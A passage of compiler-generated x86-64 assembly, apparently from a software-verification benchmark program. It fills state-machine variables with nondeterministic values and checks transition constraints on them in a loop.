movl %eax, %ecx
movq __x_sm6_l@GOTPCREL(%rip), %rax
movl %ecx, (%rax)
callq ___VERIFIER_nondet_int
movl %eax, %ecx
movq __x_sm7_l@GOTPCREL(%rip), %rax
movl %ecx, (%rax)
callq ___VERIFIER_nondet_bool
movb %al, %cl
movq __x_sm5_state@GOTPCREL(%rip), %rax
movb %cl, (%rax)
callq ___VERIFIER_nondet_int
movl %eax, %ecx
movq __x_run@GOTPCREL(%rip), %rax
movl %ecx, (%rax)
callq ___VERIFIER_nondet_int
movl %eax, %ecx
movq __x_sm2_l@GOTPCREL(%rip), %rax
movl %ecx, (%rax)
callq ___VERIFIER_nondet_int
movl %eax, %ecx
movq __x_sm0_loop_len@GOTPCREL(%rip), %rax
movl %ecx, (%rax)
callq ___VERIFIER_nondet_int
movl %eax, %ecx
movq __x_sm0_l@GOTPCREL(%rip), %rax
movl %ecx, (%rax)
callq ___VERIFIER_nondet_bool
movb %al, %cl
movq __x_sm8_state@GOTPCREL(%rip), %rax
movb %cl, (%rax)
callq ___VERIFIER_nondet_int
movl %eax, %ecx
movq __x_sm1_loop_len@GOTPCREL(%rip), %rax
movl %ecx, (%rax)
callq ___VERIFIER_nondet_bool
movb %al, %cl
movq __x_sm2_state@GOTPCREL(%rip), %rax
movb %cl, (%rax)
callq ___VERIFIER_nondet_int
movl %eax, %ecx
movq __x_sm3_l@GOTPCREL(%rip), %rax
movl %ecx, (%rax)
callq ___VERIFIER_nondet_bool
movb %al, %cl
movq __x_sm0_state@GOTPCREL(%rip), %rax
movb %cl, (%rax)
callq ___VERIFIER_nondet_bool
movb %al, %cl
movq __x_sm1_state@GOTPCREL(%rip), %rax
movb %cl, (%rax)
callq ___VERIFIER_nondet_int
movl %eax, %ecx
movq __x_sm1_l@GOTPCREL(%rip), %rax
movl %ecx, (%rax)
callq ___VERIFIER_nondet_int
movl %eax, %ecx
movq __x_sm5_l@GOTPCREL(%rip), %rax
movl %ecx, (%rax)
callq ___VERIFIER_nondet_int
movl %eax, %ecx
movq __x_sm4_l@GOTPCREL(%rip), %rax
movl %ecx, (%rax)
callq ___VERIFIER_nondet_int
movl %eax, %ecx
movq __x_sm2_loop_len@GOTPCREL(%rip), %rax
movl %ecx, (%rax)
callq ___VERIFIER_nondet_bool
movb %al, %cl
movq __x_sm9_state@GOTPCREL(%rip), %rax
movb %cl, (%rax)
callq ___VERIFIER_nondet_int
movl %eax, %ecx
movq __x_sm9_l@GOTPCREL(%rip), %rax
movl %ecx, (%rax)
callq ___VERIFIER_nondet_int
movl %eax, %ecx
movq __x_sm3_loop_len@GOTPCREL(%rip), %rax
movl %ecx, (%rax)
callq ___VERIFIER_nondet_bool
movb %al, %cl
movq __x_sm10_state@GOTPCREL(%rip), %rax
movb %cl, (%rax)
callq ___VERIFIER_nondet_bool
movb %al, %cl
movq __x_sm18_state@GOTPCREL(%rip), %rax
movb %cl, (%rax)
callq ___VERIFIER_nondet_int
movl %eax, %ecx
movq __x_sm11_loop_len@GOTPCREL(%rip), %rax
movl %ecx, (%rax)
callq ___VERIFIER_nondet_int
movl %eax, %ecx
movq __x_sm10_l@GOTPCREL(%rip), %rax
movl %ecx, (%rax)
callq ___VERIFIER_nondet_int
movl %eax, %ecx
movq __x_sm4_loop_len@GOTPCREL(%rip), %rax
movl %ecx, (%rax)
callq ___VERIFIER_nondet_bool
movb %al, %cl
movq __x_sm11_state@GOTPCREL(%rip), %rax
movb %cl, (%rax)
callq ___VERIFIER_nondet_bool
movb %al, %cl
movq __x_sm19_state@GOTPCREL(%rip), %rax
movb %cl, (%rax)
callq ___VERIFIER_nondet_int
movl %eax, %ecx
movq __x_sm12_loop_len@GOTPCREL(%rip), %rax
movl %ecx, (%rax)
callq ___VERIFIER_nondet_int
movl %eax, %ecx
movq __x_sm11_l@GOTPCREL(%rip), %rax
movl %ecx, (%rax)
callq ___VERIFIER_nondet_int
movl %eax, %ecx
movq __x_sm5_loop_len@GOTPCREL(%rip), %rax
movl %ecx, (%rax)
callq ___VERIFIER_nondet_bool
movb %al, %cl
movq __x_sm12_state@GOTPCREL(%rip), %rax
movb %cl, (%rax)
callq ___VERIFIER_nondet_bool
movb %al, %cl
movq __x_sm20_state@GOTPCREL(%rip), %rax
movb %cl, (%rax)
callq ___VERIFIER_nondet_int
movl %eax, %ecx
movq __x_sm13_loop_len@GOTPCREL(%rip), %rax
movl %ecx, (%rax)
callq ___VERIFIER_nondet_int
movl %eax, %ecx
movq __x_sm12_l@GOTPCREL(%rip), %rax
movl %ecx, (%rax)
callq ___VERIFIER_nondet_int
movl %eax, %ecx
movq __x_sm6_loop_len@GOTPCREL(%rip), %rax
movl %ecx, (%rax)
callq ___VERIFIER_nondet_bool
movb %al, %cl
movq __x_sm13_state@GOTPCREL(%rip), %rax
movb %cl, (%rax)
callq ___VERIFIER_nondet_bool
movb %al, %cl
movq __x_sm21_state@GOTPCREL(%rip), %rax
movb %cl, (%rax)
callq ___VERIFIER_nondet_int
movl %eax, %ecx
movq __x_sm14_loop_len@GOTPCREL(%rip), %rax
movl %ecx, (%rax)
callq ___VERIFIER_nondet_int
movl %eax, %ecx
movq __x_sm13_l@GOTPCREL(%rip), %rax
movl %ecx, (%rax)
callq ___VERIFIER_nondet_int
movl %eax, %ecx
movq __x_sm7_loop_len@GOTPCREL(%rip), %rax
movl %ecx, (%rax)
callq ___VERIFIER_nondet_bool
movb %al, %cl
movq __x_sm14_state@GOTPCREL(%rip), %rax
movb %cl, (%rax)
callq ___VERIFIER_nondet_int
movl %eax, %ecx
movq __x_sm15_loop_len@GOTPCREL(%rip), %rax
movl %ecx, (%rax)
callq ___VERIFIER_nondet_int
movl %eax, %ecx
movq __x_sm14_l@GOTPCREL(%rip), %rax
movl %ecx, (%rax)
callq ___VERIFIER_nondet_int
movl %eax, %ecx
movq __x_sm8_loop_len@GOTPCREL(%rip), %rax
movl %ecx, (%rax)
callq ___VERIFIER_nondet_bool
movb %al, %cl
movq __x_sm15_state@GOTPCREL(%rip), %rax
movb %cl, (%rax)
callq ___VERIFIER_nondet_int
movl %eax, %ecx
movq __x_sm16_loop_len@GOTPCREL(%rip), %rax
movl %ecx, (%rax)
callq ___VERIFIER_nondet_int
movl %eax, %ecx
movq __x_sm15_l@GOTPCREL(%rip), %rax
movl %ecx, (%rax)
callq ___VERIFIER_nondet_int
movl %eax, %ecx
movq __x_sm9_loop_len@GOTPCREL(%rip), %rax
movl %ecx, (%rax)
callq ___VERIFIER_nondet_bool
movb %al, %cl
movq __x_sm16_state@GOTPCREL(%rip), %rax
movb %cl, (%rax)
callq ___VERIFIER_nondet_int
movl %eax, %ecx
movq __x_sm17_loop_len@GOTPCREL(%rip), %rax
movl %ecx, (%rax)
callq ___VERIFIER_nondet_int
movl %eax, %ecx
movq __x_semaphore@GOTPCREL(%rip), %rax
movl %ecx, (%rax)
callq ___VERIFIER_nondet_int
movl %eax, %ecx
movq __x_sm16_l@GOTPCREL(%rip), %rax
movl %ecx, (%rax)
callq ___VERIFIER_nondet_int
movl %eax, %ecx
movq __x_sm10_loop_len@GOTPCREL(%rip), %rax
movl %ecx, (%rax)
callq ___VERIFIER_nondet_bool
movb %al, %cl
movq __x_sm17_state@GOTPCREL(%rip), %rax
movb %cl, (%rax)
callq ___VERIFIER_nondet_int
movl %eax, %ecx
movq __x_sm18_loop_len@GOTPCREL(%rip), %rax
movl %ecx, (%rax)
callq ___VERIFIER_nondet_int
movl %eax, %ecx
movq __x_sm17_l@GOTPCREL(%rip), %rax
movl %ecx, (%rax)
callq ___VERIFIER_nondet_int
movl %eax, %ecx
movq __x_sm18_l@GOTPCREL(%rip), %rax
movl %ecx, (%rax)
movq __x_semaphore@GOTPCREL(%rip), %rax
cmpl $0, (%rax)
je LBB1_73
## %bb.72: ## in Loop: Header=BB1_70 Depth=1
xorl %eax, %eax
## kill: def $al killed $al killed $eax
movq _semaphore@GOTPCREL(%rip), %rcx
cmpl $22, (%rcx)
movb %al, -12(%rbp) ## 1-byte Spill
je LBB1_693
LBB1_73: ## in Loop: Header=BB1_70 Depth=1
movq _sm0_l@GOTPCREL(%rip), %rax
cmpl $0, (%rax)
jne LBB1_75
## %bb.74: ## in Loop: Header=BB1_70 Depth=1
movq __x_sm0_loop_len@GOTPCREL(%rip), %rax
movl (%rax), %eax
movq _sm0_loop_len@GOTPCREL(%rip), %rcx
cmpl (%rcx), %eax
jg LBB1_77
LBB1_75: ## in Loop: Header=BB1_70 Depth=1
movq __x_sm0_state@GOTPCREL(%rip), %rax
movsbl (%rax), %eax
cmpl $0, %eax
je LBB1_77
## %bb.76: ## in Loop: Header=BB1_70 Depth=1
movq _sm0_state@GOTPCREL(%rip), %rax
movsbl (%rax), %ecx
xorl %eax, %eax
## kill: def $al killed $al killed $eax
cmpl $0, %ecx
movb %al, -12(%rbp) ## 1-byte Spill
je LBB1_693
LBB1_77: ## in Loop: Header=BB1_70 Depth=1
movq __x_sm0_state@GOTPCREL(%rip), %rax
movsbl (%rax), %eax
cmpl $0, %eax
je LBB1_79
## %bb.78: ## in Loop: Header=BB1_70 Depth=1
movq _sm0_state@GOTPCREL(%rip), %rax
movsbl (%rax), %eax
cmpl $0, %eax
je LBB1_80
LBB1_79: ## in Loop: Header=BB1_70 Depth=1
movq _sm0_loop_len@GOTPCREL(%rip), %rax
movl (%rax), %ecx
xorl %eax, %eax
## kill: def $al killed $al killed $eax
movq __x_sm0_loop_len@GOTPCREL(%rip), %rdx
cmpl (%rdx), %ecx
movb %al, -12(%rbp) ## 1-byte Spill
jne LBB1_693
LBB1_80: ## in Loop: Header=BB1_70 Depth=1
movq _sm0_state@GOTPCREL(%rip), %rax
movsbl (%rax), %eax
cmpl $0, %eax
je LBB1_82
## %bb.81: ## in Loop: Header=BB1_70 Depth=1
movq _sm0_l@GOTPCREL(%rip), %rax
movl (%rax), %ecx
movq __x_sm0_l@GOTPCREL(%rip), %rax
imull $4294967295, (%rax), %eax ## imm = 0xFFFFFFFF
addl %eax, %ecx
xorl %eax, %eax
## kill: def $al killed $al killed $eax
cmpl $1, %ecx
movb %al, -12(%rbp) ## 1-byte Spill
jne LBB1_693
LBB1_82: ## in Loop: Header=BB1_70 Depth=1
movq __x_sm0_state@GOTPCREL(%rip), %rax
movsbl (%rax), %eax
cmpl $0, %eax
jne LBB1_85
## %bb.83: ## in Loop: Header=BB1_70 Depth=1
movq _sm0_state@GOTPCREL(%rip), %rax
movsbl (%rax), %eax
cmpl $0, %eax
je LBB1_85
## %bb.84: ## in Loop: Header=BB1_70 Depth=1
movq _sm0_loop_len@GOTPCREL(%rip), %rax
movl (%rax), %ecx
xorl %eax, %eax
## kill: def $al killed $al killed $eax
movq _sm0_l@GOTPCREL(%rip), %rdx
cmpl (%rdx), %ecx
movb %al, -12(%rbp) ## 1-byte Spill
jg LBB1_693
LBB1_85: ## in Loop: Header=BB1_70 Depth=1
movq __x_sm0_state@GOTPCREL(%rip), %rax
movsbl (%rax), %eax
cmpl $0, %eax
jne LBB1_89
## %bb.86: ## in Loop: Header=BB1_70 Depth=1
movq _semaphore@GOTPCREL(%rip), %rax
cmpl $22, (%rax)
jne LBB1_89
## %bb.87: ## in Loop: Header=BB1_70 Depth=1
movq __x_semaphore@GOTPCREL(%rip), %rax
cmpl $0, (%rax)
jne LBB1_89
## %bb.88: ## in Loop: Header=BB1_70 Depth=1
movq _sm0_state@GOTPCREL(%rip), %rax
movsbl (%rax), %ecx
xorl %eax, %eax
## kill: def $al killed $al killed $eax
cmpl $0, %ecx
movb %al, -12(%rbp) ## 1-byte Spill
je LBB1_693
LBB1_89: ## in Loop: Header=BB1_70 Depth=1
movq _sm0_state@GOTPCREL(%rip), %rax
movsbl (%rax), %eax
cmpl $0, %eax
setne %al
andb $1, %al
movzbl %al, %eax
movq __x_sm0_state@GOTPCREL(%rip), %rcx
movsbl (%rcx), %ecx
cmpl $0, %ecx
setne %cl
andb $1, %cl
movzbl %cl, %ecx
cmpl %ecx, %eax
je LBB1_94
## %bb.90: ## in Loop: Header=BB1_70 Depth=1
movq _semaphore@GOTPCREL(%rip), %rax
cmpl $22, (%rax)
jne LBB1_93
## %bb.91: ## in Loop: Header=BB1_70 Depth=1
movq __x_semaphore@GOTPCREL(%rip), %rax
cmpl $0, (%rax)
jne LBB1_93
## %bb.92: ## in Loop: Header=BB1_70 Depth=1
movq _sm0_state@GOTPCREL(%rip), %rax
movsbl (%rax), %eax
cmpl $0, %eax
je LBB1_94
LBB1_93: ## in Loop: Header=BB1_70 Depth=1
xorl %eax, %eax
## kill: def $al killed $al killed $eax
movq _run@GOTPCREL(%rip), %rcx
cmpl $0, (%rcx)
movb %al, -12(%rbp) ## 1-byte Spill
jne LBB1_693
LBB1_94: ## in Loop: Header=BB1_70 Depth=1
movq _semaphore@GOTPCREL(%rip), %rax
movl (%rax), %eax
movq __x_semaphore@GOTPCREL(%rip), %rcx
cmpl (%rcx), %eax
je LBB1_97
## %bb.95: ## in Loop: Header=BB1_70 Depth=1
movq _run@GOTPCREL(%rip), %rax
cmpl $0, (%rax)
jne LBB1_97
## %bb.96: ## in Loop: Header=BB1_70 Depth=1
movq _sm0_state@GOTPCREL(%rip), %rax
movsbl (%rax), %eax
cmpl $0, %eax
setne %al
andb $1, %al
movzbl %al, %ecx
movq __x_sm0_state@GOTPCREL(%rip), %rax
movsbl (%rax), %eax
cmpl $0, %eax
setne %al
andb $1, %al
movzbl %al, %edx
xorl %eax, %eax
## kill: def $al killed $al killed $eax
cmpl %edx, %ecx
movb %al, -12(%rbp) ## 1-byte Spill
je LBB1_693
LBB1_97: ## in Loop: Header=BB1_70 Depth=1
movq _semaphore@GOTPCREL(%rip), %rax
movl (%rax), %eax
movq __x_semaphore@GOTPCREL(%rip), %rcx
imull $4294967295, (%rcx), %ecx ## imm = 0xFFFFFFFF
addl %ecx, %eax
cmpl $-1, %eax
je LBB1_101
## %bb.98: ## in Loop: Header=BB1_70 Depth=1
movq __x_sm0_state@GOTPCREL(%rip), %rax
movsbl (%rax), %eax
cmpl $0, %eax
jne LBB1_101
## %bb.99: ## in Loop: Header=BB1_70 Depth=1
movq _run@GOTPCREL(%rip), %rax
cmpl $0, (%rax)
jne LBB1_101
## %bb.100: ## in Loop: Header=BB1_70 Depth=1
movq _sm0_state@GOTPCREL(%rip), %rax
movsbl (%rax), %ecx
xorl %eax, %eax
## kill: def $al killed $al killed $eax
cmpl $0, %ecx
movb %al, -12(%rbp) ## 1-byte Spill
jne LBB1_693
LBB1_101: ## in Loop: Header=BB1_70 Depth=1
movq _sm1_l@GOTPCREL(%rip), %rax
cmpl $0, (%rax)
jne LBB1_103
## %bb.102: ## in Loop: Header=BB1_70 Depth=1
movq __x_sm1_loop_len@GOTPCREL(%rip), %rax
movl (%rax), %eax
movq _sm1_loop_len@GOTPCREL(%rip), %rcx
cmpl (%rcx), %eax
jg LBB1_105
LBB1_103: ## in Loop: Header=BB1_70 Depth=1
movq __x_sm1_state@GOTPCREL(%rip), %rax
movsbl (%rax), %eax
cmpl $0, %eax
je LBB1_105
## %bb.104: ## in Loop: Header=BB1_70 Depth=1
movq _sm1_state@GOTPCREL(%rip), %rax
movsbl (%rax), %ecx
xorl %eax, %eax
## kill: def $al killed $al killed $eax
cmpl $0, %ecx
movb %al, -12(%rbp) ## 1-byte Spill
je LBB1_693
LBB1_105: ## in Loop: Header=BB1_70 Depth=1
movq __x_sm1_state@GOTPCREL(%rip), %rax
movsbl (%rax), %eax
cmpl $0, %eax
je LBB1_107
## %bb.106: ## in Loop: Header=BB1_70 Depth=1
movq _sm1_state@GOTPCREL(%rip), %rax
movsbl (%rax), %eax
cmpl $0, %eax
je LBB1_108
LBB1_107: ## in Loop: Header=BB1_70 Depth=1
movq _sm1_loop_len@GOTPCREL(%rip), %rax
movl (%rax), %ecx
xorl %eax, %eax
## kill: def $al killed $al killed $eax
movq __x_sm1_loop_len@GOTPCREL(%rip), %rdx
cmpl (%rdx), %ecx
movb %al, -12(%rbp) ## 1-byte Spill
jne LBB1_693
LBB1_108: ## in Loop: Header=BB1_70 Depth=1
movq _sm1_state@GOTPCREL(%rip), %rax
movsbl (%rax), %eax
cmpl $0, %eax
je LBB1_110
## %bb.109: ## in Loop: Header=BB1_70 Depth=1
movq _sm1_l@GOTPCREL(%rip), %rax
movl (%rax), %ecx
movq __x_sm1_l@GOTPCREL(%rip), %rax
imull $4294967295, (%rax), %eax ## imm = 0xFFFFFFFF
addl %eax, %ecx
xorl %eax, %eax
## kill: def $al killed $al killed $eax
cmpl $1, %ecx
movb %al, -12(%rbp) ## 1-byte Spill
jne LBB1_693
LBB1_110: ## in Loop: Header=BB1_70 Depth=1
movq __x_sm1_state@GOTPCREL(%rip), %rax
movsbl (%rax), %eax
cmpl $0, %eax
jne LBB1_113
## %bb.111: ## in Loop: Header=BB1_70 Depth=1
movq _sm1_state@GOTPCREL(%rip), %rax
movsbl (%rax), %eax
cmpl $0, %eax
je LBB1_113
## %bb.112: ## in Loop: Header=BB1_70 Depth=1
movq _sm1_loop_len@GOTPCREL(%rip), %rax
movl (%rax), %ecx
xorl %eax, %eax
## kill: def $al killed $al killed $eax
movq _sm1_l@GOTPCREL(%rip), %rdx
cmpl (%rdx), %ecx
movb %al, -12(%rbp) ## 1-byte Spill
jg LBB1_693
LBB1_113: ## in Loop: Header=BB1_70 Depth=1
movq __x_sm1_state@GOTPCREL(%rip), %rax
movsbl (%rax), %eax
cmpl $0, %eax
jne LBB1_117
## %bb.114: ## in Loop: Header=BB1_70 Depth=1
movq _semaphore@GOTPCREL(%rip), %rax
cmpl $22, (%rax)
jne LBB1_117
## %bb.115: ## in Loop: Header=BB1_70 Depth=1
movq __x_semaphore@GOTPCREL(%rip), %rax
cmpl $0, (%rax)
jne LBB1_117
## %bb.116: ## in Loop: Header=BB1_70 Depth=1
movq _sm1_state@GOTPCREL(%rip), %rax
movsbl (%rax), %ecx
xorl %eax, %eax
## kill: def $al killed $al killed $eax
cmpl $0, %ecx
movb %al, -12(%rbp) ## 1-byte Spill
je LBB1_693
LBB1_117: ## in Loop: Header=BB1_70 Depth=1
movq _sm1_state@GOTPCREL(%rip), %rax
movsbl (%rax), %eax
cmpl $0, %eax
setne %al
andb $1, %al
movzbl %al, %eax
movq __x_sm1_state@GOTPCREL(%rip), %rcx
movsbl (%rcx), %ecx
cmpl $0, %ecx
setne %cl
andb $1, %cl
movzbl %cl, %ecx
cmpl %ecx, %eax
je LBB1_122
## %bb.118: ## in Loop: Header=BB1_70 Depth=1
movq _semaphore@GOTPCREL(%rip), %rax
cmpl $22, (%rax)
jne LBB1_121
## %bb.119: ## in Loop: Header=BB1_70 Depth=1
movq __x_semaphore@GOTPCREL(%rip), %rax
cmpl $0, (%rax)
jne LBB1_121
## %bb.120: ## in Loop: Header=BB1_70 Depth=1
movq _sm1_state@GOTPCREL(%rip), %rax
movsbl (%rax), %eax
cmpl $0, %eax
je LBB1_122
LBB1_121: ## in Loop: Header=BB1_70 Depth=1
xorl %eax, %eax
## kill: def $al killed $al killed $eax
movq _run@GOTPCREL(%rip), %rcx
cmpl $1, (%rcx)
movb %al, -12(%rbp) ## 1-byte Spill
jne LBB1_693
LBB1_122: ## in Loop: Header=BB1_70 Depth=1
movq _semaphore@GOTPCREL(%rip), %rax
movl (%rax), %eax
movq __x_semaphore@GOTPCREL(%rip), %rcx
cmpl (%rcx), %eax
je LBB1_125
## %bb.123: ## in Loop: Header=BB1_70 Depth=1
movq _run@GOTPCREL(%rip), %rax
cmpl $1, (%rax)
jne LBB1_125
## %bb.124: ## in Loop: Header=BB1_70 Depth=1
movq _sm1_state@GOTPCREL(%rip), %rax
movsbl (%rax), %eax
cmpl $0, %eax
setne %al
andb $1, %al
movzbl %al, %ecx
movq __x_sm1_state@GOTPCREL(%rip), %rax
movsbl (%rax), %eax
cmpl $0, %eax
setne %al
andb $1, %al
movzbl %al, %edx
xorl %eax, %eax
## kill: def $al killed $al killed $eax
cmpl %edx, %ecx
movb %al, -12(%rbp) ## 1-byte Spill
je LBB1_693
LBB1_125: ## in Loop: Header=BB1_70 Depth=1
movq _semaphore@GOTPCREL(%rip), %rax
movl (%rax), %eax
movq __x_semaphore@GOTPCREL(%rip), %rcx
imull $4294967295, (%rcx), %ecx ## imm = 0xFFFFFFFF
addl %ecx, %eax
cmpl $-1, %eax
je LBB1_129
## %bb.126: ## in Loop: Header=BB1_70 Depth=1
movq __x_sm1_state@GOTPCREL(%rip), %rax
movsbl (%rax), %eax
cmpl $0, %eax
jne LBB1_129
## %bb.127: ## in Loop: Header=BB1_70 Depth=1
movq _run@GOTPCREL(%rip), %rax
cmpl $1, (%rax)
jne LBB1_129
## %bb.128: ## in Loop: Header=BB1_70 Depth=1
movq _sm1_state@GOTPCREL(%rip), %rax
movsbl (%rax), %ecx
xorl %eax, %eax
## kill: def $al killed $al killed $eax
cmpl $0, %ecx
movb %al, -12(%rbp) ## 1-byte Spill
jne LBB1_693
LBB1_129: ## in Loop: Header=BB1_70 Depth=1
movq _sm2_l@GOTPCREL(%rip), %rax
cmpl $0, (%rax)
jne LBB1_131
## %bb.130: ## in Loop: Header=BB1_70 Depth=1
movq __x_sm2_loop_len@GOTPCREL(%rip), %rax
movl (%rax), %eax
movq _sm2_loop_len@GOTPCREL(%rip), %rcx
cmpl (%rcx), %eax
jg LBB1_133
LBB1_131: ## in Loop: Header=BB1_70 Depth=1
movq __x_sm2_state@GOTPCREL(%rip), %rax
movsbl (%rax), %eax
cmpl $0, %eax
je LBB1_133
## %bb.132: ## in Loop: Header=BB1_70 Depth=1
movq _sm2_state@GOTPCREL(%rip), %rax
movsbl (%rax), %ecx
xorl %eax, %eax
## kill: def $al killed $al killed $eax
cmpl $0, %ecx
movb %al, -12(%rbp) ## 1-byte Spill
je LBB1_693
LBB1_133: ## in Loop: Header=BB1_70 Depth=1
movq __x_sm2_state@GOTPCREL(%rip), %rax
movsbl (%rax), %eax
cmpl $0, %eax
je LBB1_135
## %bb.134: ## in Loop: Header=BB1_70 Depth=1
movq _sm2_state@GOTPCREL(%rip), %rax
movsbl (%rax), %eax
cmpl $0, %eax
je LBB1_136
LBB1_135: ## in Loop: Header=BB1_70 Depth=1
movq _sm2_loop_len@GOTPCREL(%rip), %rax
movl (%rax), %ecx
xorl %eax, %eax
## kill: def $al killed $al killed $eax
movq __x_sm2_loop_len@GOTPCREL(%rip), %rdx
cmpl (%rdx), %ecx
movb %al, -12(%rbp) ## 1-byte Spill
jne LBB1_693
LBB1_136: ## in Loop: Header=BB1_70 Depth=1
movq _sm2_state@GOTPCREL(%rip), %rax
movsbl (%rax), %eax
cmpl $0, %eax
je LBB1_138
## %bb.137: ## in Loop: Header=BB1_70 Depth=1
movq _sm2_l@GOTPCREL(%rip), %rax
movl (%rax), %ecx
movq __x_sm2_l@GOTPCREL(%rip), %rax
imull $4294967295, (%rax), %eax ## imm = 0xFFFFFFFF
addl %eax, %ecx
xorl %eax, %eax
## kill: def $al killed $al killed $eax
cmpl $1, %ecx
movb %al, -12(%rbp) ## 1-byte Spill
jne LBB1_693
LBB1_138: ## in Loop: Header=BB1_70 Depth=1
movq __x_sm2_state@GOTPCREL(%rip), %rax
movsbl (%rax), %eax
cmpl $0, %eax
jne LBB1_141
## %bb.139: ## in Loop: Header=BB1_70 Depth=1
movq _sm2_state@GOTPCREL(%rip), %rax
movsbl (%rax), %eax
cmpl $0, %eax
je LBB1_141
## %bb.140: ## in Loop: Header=BB1_70 Depth=1
movq _sm2_loop_len@GOTPCREL(%rip), %rax
movl (%rax), %ecx
xorl %eax, %eax
## kill: def $al killed $al killed $eax
movq _sm2_l@GOTPCREL(%rip), %rdx
cmpl (%rdx), %ecx
movb %al, -12(%rbp) ## 1-byte Spill
jg LBB1_693
LBB1_141: ## in Loop: Header=BB1_70 Depth=1
movq __x_sm2_state@GOTPCREL(%rip), %rax
movsbl (%rax), %eax
cmpl $0, %eax
jne LBB1_145
## %bb.142: ## in Loop: Header=BB1_70 Depth=1
movq _semaphore@GOTPCREL(%rip), %rax
cmpl $22, (%rax)
jne LBB1_145
## %bb.143: ## in Loop: Header=BB1_70 Depth=1
movq __x_semaphore@GOTPCREL(%rip), %rax
cmpl $0, (%rax)
jne LBB1_145
## %bb.144: ## in Loop: Header=BB1_70 Depth=1
movq _sm2_state@GOTPCREL(%rip), %rax
movsbl (%rax), %ecx
xorl %eax, %eax
## kill: def $al killed $al killed $eax
cmpl $0, %ecx
movb %al, -12(%rbp) ## 1-byte Spill
je LBB1_693
LBB1_145: ## in Loop: Header=BB1_70 Depth=1
movq _sm2_state@GOTPCREL(%rip), %rax
movsbl (%rax), %eax
cmpl $0, %eax
setne %al
andb $1, %al
movzbl %al, %eax
movq __x_sm2_state@GOTPCREL(%rip), %rcx
movsbl (%rcx), %ecx
cmpl $0, %ecx
setne %cl
andb $1, %cl
movzbl %cl, %ecx
cmpl %ecx, %eax
je LBB1_150
## %bb.146: ## in Loop: Header=BB1_70 Depth=1
movq _semaphore@GOTPCREL(%rip), %rax
cmpl $22, (%rax)
jne LBB1_149
## %bb.147: ## in Loop: Header=BB1_70 Depth=1
movq __x_semaphore@GOTPCREL(%rip), %rax
cmpl $0, (%rax)
jne LBB1_149
## %bb.148: ## in Loop: Header=BB1_70 Depth=1
movq _sm2_state@GOTPCREL(%rip), %rax
movsbl (%rax), %eax
cmpl $0, %eax
je LBB1_150
LBB1_149: ## in Loop: Header=BB1_70 Depth=1
xorl %eax, %eax
## kill: def $al killed $al killed $eax
movq _run@GOTPCREL(%rip), %rcx
cmpl $2, (%rcx)
movb %al, -12(%rbp) ## 1-byte Spill
jne LBB1_693
LBB1_150: ## in Loop: Header=BB1_70 Depth=1
movq _semaphore@GOTPCREL(%rip), %rax
movl (%rax), %eax
movq __x_semaphore@GOTPCREL(%rip), %rcx
cmpl (%rcx), %eax
je LBB1_153
## %bb.151: ## in Loop: Header=BB1_70 Depth=1
movq _run@GOTPCREL(%rip), %rax
cmpl $2, (%rax)
jne LBB1_153
## %bb.152: ## in Loop: Header=BB1_70 Depth=1
movq _sm2_state@GOTPCREL(%rip), %rax
movsbl (%rax), %eax
cmpl $0, %eax
setne %al
andb $1, %al
movzbl %al, %ecx
movq __x_sm2_state@GOTPCREL(%rip), %rax
movsbl (%rax), %eax
cmpl $0, %eax
setne %al
andb $1, %al
movzbl %al, %edx
xorl %eax, %eax
## kill: def $al killed $al killed $eax
cmpl %edx, %ecx
movb %al, -12(%rbp) ## 1-byte Spill
je LBB1_693
LBB1_153: ## in Loop: Header=BB1_70 Depth=1
movq _semaphore@GOTPCREL(%rip), %rax
movl (%rax), %eax
movq __x_semaphore@GOTPCREL(%rip), %rcx
imull $4294967295, (%rcx), %ecx ## imm = 0xFFFFFFFF
addl %ecx, %eax
cmpl $-1, %eax
je LBB1_157
## %bb.154: ## in Loop: Header=BB1_70 Depth=1
movq __x_sm2_state@GOTPCREL(%rip), %rax
movsbl (%rax), %eax
cmpl $0, %eax
jne LBB1_157
## %bb.155: ## in Loop: Header=BB1_70 Depth=1
movq _run@GOTPCREL(%rip), %rax
cmpl $2, (%rax)
jne LBB1_157
## %bb.156: ## in Loop: Header=BB1_70 Depth=1
movq _sm2_state@GOTPCREL(%rip), %rax
movsbl (%rax), %ecx
xorl %eax, %eax
## kill: def $al killed $al killed $eax
cmpl $0, %ecx
movb %al, -12(%rbp) ## 1-byte Spill
jne LBB1_693
LBB1_157: ## in Loop: Header=BB1_70 Depth=1
movq _sm3_l@GOTPCREL(%rip), %rax
cmpl $0, (%rax)
jne LBB1_159
## %bb.158: ## in Loop: Header=BB1_70 Depth=1
movq __x_sm3_loop_len@GOTPCREL(%rip), %rax
movl (%rax), %eax
movq _sm3_loop_len@GOTPCREL(%rip), %rcx
cmpl (%rcx), %eax
jg LBB1_161
LBB1_159: ## in Loop: Header=BB1_70 Depth=1
movq __x_sm3_state@GOTPCREL(%rip), %rax
movsbl (%rax), %eax
cmpl $0, %eax
je LBB1_161
## %bb.160: ## in Loop: Header=BB1_70 Depth=1
movq _sm3_state@GOTPCREL(%rip), %rax
movsbl (%rax), %ecx
xorl %eax, %eax
## kill: def $al killed $al killed $eax
cmpl $0, %ecx
movb %al, -12(%rbp) ## 1-byte Spill
je LBB1_693
LBB1_161: ## in Loop: Header=BB1_70 Depth=1
movq __x_sm3_state@GOTPCREL(%rip), %rax
movsbl (%rax), %eax
cmpl $0, %eax
je LBB1_163
## %bb.162: ## in Loop: Header=BB1_70 Depth=1
movq _sm3_state@GOTPCREL(%rip), %rax
movsbl (%rax), %eax
cmpl $0, %eax
je LBB1_164
LBB1_163: ## in Loop: Header=BB1_70 Depth=1
movq _sm3_loop_len@GOTPCREL(%rip), %rax
movl (%rax), %ecx
xorl %eax, %eax
## kill: def $al killed $al killed $eax
movq __x_sm3_loop_len@GOTPCREL(%rip), %rdx
cmpl (%rdx), %ecx
movb %al, -12(%rbp) ## 1-byte Spill
jne LBB1_693
LBB1_164: ## in Loop: Header=BB1_70 Depth=1
movq _sm3_state@GOTPCREL(%rip), %rax
movsbl (%rax), %eax
cmpl $0, %eax
je LBB1_166
## %bb.165: ## in Loop: Header=BB1_70 Depth=1
movq _sm3_l@GOTPCREL(%rip), %rax
movl (%rax), %ecx
movq __x_sm3_l@GOTPCREL(%rip), %rax
imull $4294967295, (%rax), %eax ## imm = 0xFFFFFFFF
addl %eax, %ecx
xorl %eax, %eax
## kill: def $al killed $al killed $eax
cmpl $1, %ecx
movb %al, -12(%rbp) ## 1-byte Spill
jne LBB1_693
LBB1_166: ## in Loop: Header=BB1_70 Depth=1
movq __x_sm3_state@GOTPCREL(%rip), %rax
movsbl (%rax), %eax
cmpl $0, %eax
